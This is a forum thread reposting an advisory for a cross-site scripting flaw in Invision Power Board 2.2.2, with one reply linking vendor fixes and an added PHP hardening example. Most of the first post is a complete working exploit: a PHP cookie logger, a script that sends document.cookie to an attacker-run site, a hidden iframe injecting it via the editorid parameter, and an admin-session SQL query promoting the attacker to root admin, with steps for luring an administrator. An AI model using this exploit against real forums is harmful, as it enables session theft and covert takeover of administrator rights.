  [Announcement]   Invision Power Board Cross Site Scripting Vulnerability 04/06/2007 18:26:02 (+0700) | #1 | 63100
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Invision Power Board Cross Site Scripting Vulnerability
------------------------------------------------------------------------


SUMMARY
A vulnerability in Invision Power Board allows remote attackers to cause a cross site scripting vulnerability, which in turn can be used to cause the administrator of the forum, or any other privileged user, to execute arbitrary commands (SQL commands). The following exploit code can be used to test your system for the mentioned vulnerability.

DETAILS
Vulnerable Systems:
* Invision Power Board version 2.2.2

Exploit:
Code:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#
# Invision Power Board 2.2.2 Cross Site Scripting vulnerability
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# Vendor site: http://www.invisionboard.com/
# Vulnerability found by Iron (http://www.ironwarez.info)
#
# Greets to all RootShell Security Group members
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# The vulnerability:
# Open up any php file in /jscripts/folder_rte_files
#  See:

    var editor_id         = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?>
 
#
# $_REQUEST['editorid'] isn't sanitized in any way, so allows
# other users to execute their own code.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# PoC (Log cookies & run SQL query)
#
# Requirements: server supporting PHP, user account on
# target forum, database prefix needs to be known.
#
# Create a file called name.php on your webserver and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#

<?php
$target = "http://www.yourtarget.com/forum"; #Target forum without 
trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root 
admin

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time: 
".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";

$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<iframe width=0 height=0 
src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql§ion=admin&query=UPDATE+'.$prefix.'members+SET+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.$member.'%27&st="></iframe>';
}
?>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#  Also create a file in the same directory named "log.txt" and chmod it 
777
#
#  Now, create a file called script.js on your webserver, put this code in 
it:
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#

document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie;

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#
#  And, last but not least, create a file that combines those two ;)
#  Name it blah.html and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#

<iframe border=0 
src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# Now, post a message on the forum or send a pm to your target with the 
link to the html page.
#  If a normal user views the page, his cookies
#  will be logged, funny. If an admin visits the page and he has an 
admin_session_id cookie set,
# he will add you to the root admin group without even knowing ;).



ADDITIONAL INFORMATION
The information has been provided by Iron.
The original article can be found at: http://www.ironwarez.info


Comment: a whole series of IPB boards is about to get vandalized.
What bringing us together is stronger than what pulling us apart.
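
The unsanitized `editorid` echo described in the advisory above, next to one way to harden it, as an added example that is not part of the original post and is not Invision Power's patch. The function names, the 32-character allowlist and the `ed-0` fallback value are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not Invision Power Board code; function names are hypothetical.

/** Allowlist: keep identifier-like editor ids, replace anything else with a default. */
function safe_editor_id($raw, string $default = 'ed-0'): string
{
    if (!is_string($raw)) {               // editorid[]=x reaches PHP as an array
        return $default;
    }
    $raw = trim($raw);
    return preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $raw) === 1 ? $raw : $default;
}

/** Encode a string as a JS literal that cannot close an inline <script> block. */
function js_literal(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

/** Behaviour described in the advisory: raw concatenation into the script block. */
function unsafe_line(string $raw): string
{
    return 'var editor_id = "' . trim($raw) . '";';
}

/** Hardened form: validate first, then encode for the JavaScript context. */
function hardened_line($raw): string
{
    return 'var editor_id = ' . js_literal(safe_editor_id($raw)) . ';';
}

// Constructed sample inputs; on the real page the value comes from $_REQUEST['editorid'].
$samples = ['ed-0', 'post_editor', '"</script><script>alert(1)</script>', ['x']];

foreach ($samples as $sample) {
    echo 'input:    ' . (is_array($sample) ? 'array' : $sample) . "\n";
    if (is_string($sample)) {
        echo 'unsafe:   ' . unsafe_line($sample) . "\n";
    }
    echo 'hardened: ' . hardened_line($sample) . "\n\n";
}
```

The allowlist alone already rejects the markup; `js_literal()` is kept as a second layer so the output stays safe if the allowlist is later loosened.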
  [Question]   Invision Power Board Cross Site Scripting Vulnerability 05/06/2007 13:50:11 (+0700) | #2 | 63269
Z0rr0

Joined: 14/08/2002 12:52:01
Messages: 1323
Location: Underground
Fixes for ver 2.2.x up to 30/5/2007 are here:
http://forums.invisionpower.com/index.php?showtopic=234377
http://forums.invisionpower.com/index.php?showtopic=235069
Hibernating